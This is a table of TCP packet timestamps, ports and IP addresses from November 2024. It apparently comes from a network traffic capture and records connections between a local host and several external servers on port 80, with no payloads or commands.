                                                                                Nov 25, 2024 11:58:11.967273951 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.178956032 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.178973913 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179171085 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179184914 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179204941 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.179364920 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.179418087 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179529905 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179749012 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.179775000 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179840088 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179898024 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180035114 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180073023 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180253029 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180295944 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180360079 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180547953 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180548906 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180680990 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180857897 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180917025 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180929899 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181171894 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181184053 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.181262016 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181512117 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.181525946 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181539059 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181824923 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.392184973 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392256021 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392301083 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392344952 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392563105 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.392626047 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392688990 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392818928 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392864943 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392968893 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393105984 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393182993 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393239975 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393385887 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393434048 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393465996 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393589973 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393735886 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393793106 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394030094 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.394033909 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394093990 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394208908 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394256115 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394371986 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.394433975 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.394539118 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394598007 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394711018 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394795895 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394821882 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.395019054 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.395088911 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.395143032 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.395349026 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:13.226857901 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.242974997 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.458612919 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.458951950 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.463921070 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.679425955 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.679543972 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.679810047 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.680053949 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.680448055 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713517904 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713532925 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713658094 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.115202904 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.115210056 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.115345955 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.115513086 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.115634918 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.115853071 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.116058111 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.116134882 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.116195917 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.116372108 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.116482973 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.116590023 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.116728067 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.116749048 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.116861105 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.117038965 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.117182016 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.117229939 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.117430925 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.117779970 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.117836952 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.117969036 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.118015051 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.118024111 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.118207932 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.118320942 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.118379116 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.118612051 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.118974924 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.119035006 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.119112015 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.119158030 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.119268894 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.119330883 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.119525909 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.119626045 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.119824886 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.119978905 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.120074034 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.120353937 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.120405912 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.120466948 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.120697021 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.120800018 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.120860100 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.121103048 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.121185064 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.121243000 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.121464968 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.121632099 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.121690989 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.121896029 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.122009993 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.122103930 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.122242928 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.122287989 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.122308969 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.122560978 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.122576952 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.122701883 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.122957945 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.123097897 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.123157978 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.123370886 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.327600956 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.327702045 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.327790976 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.327873945 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.327939987 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.327951908 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.328073025 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.328155994 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.328368902 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.328607082 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.328697920 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.328779936 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.328860044 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.328921080 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.329087973 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329097986 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.329179049 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329263926 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329343081 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329401016 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.329426050 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329507113 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329587936 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329632044 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.329679966 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.329811096 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.329895973 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330090046 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.330102921 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330190897 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330307961 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.330338955 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330420971 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330558062 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.330575943 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330662012 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330815077 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.330852985 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.330962896 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331046104 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331068993 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.331201077 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331212997 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.331284046 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331437111 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331520081 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.331602097 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331723928 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.331855059 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.331890106 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332046986 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332185030 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.332314014 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332365036 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332462072 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332500935 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332739115 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.332839966 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332892895 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.332962036 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.333081007 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.333115101 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.333261013 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.333347082 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.333488941 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.333590031 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.333594084 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.333669901 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.333909035 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.334043980 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334126949 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334196091 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334268093 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334268093 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.334552050 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.334582090 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334657907 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334774971 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.334856987 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.334994078 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335035086 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.335067987 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335140944 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335261106 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.335359097 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335431099 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335568905 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.335628033 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335761070 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335877895 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.335886955 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.336036921 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336069107 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.336169958 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336289883 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336345911 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.336535931 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336610079 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336793900 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336864948 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.336874962 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.336970091 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.337007046 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337146044 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337182045 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.337260008 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337305069 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337423086 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.337574959 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337645054 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337743044 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.337892056 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.337994099 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338215113 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338227987 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.338254929 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338409901 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.338494062 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338629961 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338659048 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:18.338727951 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338856936 CET804975431.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:18.338953972 CET4975480192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:59:49.596451044 CET804977781.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:49.596577883 CET804977781.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:49.603893042 CET804977781.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:49.604022980 CET4977780192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:50.908561945 CET4977780192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:51.924561977 CET4977880192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:52.117470026 CET804977881.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:52.117758036 CET4977880192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:52.119946003 CET4977880192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:52.312498093 CET804977881.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:52.319567919 CET804977881.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:52.319710016 CET804977881.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:52.319814920 CET804977881.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:52.319963932 CET4977880192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:52.320614100 CET4977880192.168.11.2081.88.58.216
                                                                                Nov 25, 2024 11:59:52.513529062 CET804977881.88.58.216192.168.11.20
                                                                                Nov 25, 2024 11:59:57.516441107 CET4977980192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 11:59:57.613769054 CET8049779104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 11:59:57.613926888 CET4977980192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 11:59:57.617131948 CET4977980192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 11:59:57.714489937 CET8049779104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 11:59:57.977562904 CET8049779104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 11:59:57.977572918 CET8049779104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 11:59:57.977751017 CET4977980192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 11:59:57.978396893 CET8049779104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 11:59:57.978583097 CET4977980192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 11:59:59.125489950 CET4977980192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:00.141534090 CET4978080192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:00.239161015 CET8049780104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:00.239402056 CET4978080192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:00.242579937 CET4978080192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:00.340143919 CET8049780104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:00.604089022 CET8049780104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:00.604137897 CET8049780104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:00.604171991 CET8049780104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:00.604309082 CET4978080192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:00.604309082 CET4978080192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:01.749907970 CET4978080192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:02.766166925 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:02.863257885 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.863455057 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:02.866661072 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:02.866684914 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:02.866760969 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:02.963618994 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.963746071 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.963756084 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.963762045 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.963885069 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.963927031 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:02.963934898 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:03.227453947 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:03.227464914 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:03.227494955 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:03.227727890 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:03.227790117 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:03.227993965 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:04.374325991 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.390371084 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.487399101 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.487612009 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.489787102 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.586735010 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860534906 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860546112 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860553980 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860877037 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.861143112 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.861341953 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.861998081 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.958822012 CET8049782104.21.27.59192.168.11.20
